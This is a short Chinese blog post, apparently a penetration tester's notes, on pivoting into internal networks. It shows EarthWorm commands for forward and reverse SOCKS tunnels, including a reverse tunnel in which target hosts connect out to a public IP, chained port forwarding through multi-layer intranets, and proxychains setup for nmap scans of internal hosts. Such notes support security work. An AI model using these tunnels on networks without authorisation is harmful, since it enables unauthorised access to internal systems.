2hangding's bl0g
Home
Archives
Tags
Categories
Link
About
avatar
文章
10
标签
7
分类
4
Home
Archives
Tags
Categories
Link
About
目录
  1. 1. 内网渗透代理工具总结
  2. 2. EW
    1. 2.1. 正向代理
    2. 2.2. 反向代理
    3. 2.3. 场景:某些主机不能访问公网
    4. 2.4. 场景:多层内网
  3. 3. proxychains代理
  4. 4. 剩下的以后填坑、、
内网渗透代理工具总结
|渗透

内网渗透代理工具总结

常用的代理工具有:

EW

EW下载地址
默认代理端口为1080

正向代理

Code
1
$ ./ew -s ssocksd -l 1080

反向代理

Code
1
2
3
4
1.在公网主机上运行:
  $ ./ew -s rcsocks -l 1080 -e 1234 
2.在目标主机上运行:
  $ ./ew -s rssocks -d 公网ip -e 1234

场景:某些主机不能访问公网

在同一网段,内网A可以访问公网,内网B不可以访问公网

Code
1
2
3
4
5
6
1.在公网主机上运行:
  $ ./ew -s lcx_listen -l 1080 -e 1234
2.在内网B上运行:
  $ ./ew  -s ssocksd -l 1235
2.在内网A上运行:
  $ ./ew  -s lcx_slave -d 公网ip -e 1234 -f 内网Bip -g 1235

场景:多层内网

在不同网段,内网A可以访问内网B,内网B可以访问内网C,内网C能访问核心内网

Code
1
2
3
4
5
6
7
8
1.在公网主机上运行:
  $ ./ew -s rcsocks -l 1080 -e 1234
2.在内网A上运行:
  $ ./ew  -s lcx_slave -d 公网ip -e 1234 -f 内网Bip -g 1235
3.在内网B上运行:
  $ ./ew  -s lcx_listen -l 1235 -e 1236
4.在内网C上运行:
  $ ./ew  -s rssocks -d 内网Bip -e 1236

proxychains代理

可以使用proxychains nmap 内网ip 进行扫描内网

Code
1
2
3
4
5
6
7
8
9
10
11
安装步骤:
cd /usr/local/src
git clone https://github.com/rofl0r/proxychains-ng.git
cd proxychains-ng 
./configure --prefix=/usr --sysconfdir=/etc
make && make install
make install-config
cd .. && rm -rf proxychains-ng
配置文件:
vi /etc/proxychains.conf
socks5 公网ip 1080

剩下的以后填坑、、

文章作者: 2hangd
文章链接: https://zhangding222.github.io/2018/12/27/内网渗透/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 2hangding's bl0g
内网渗透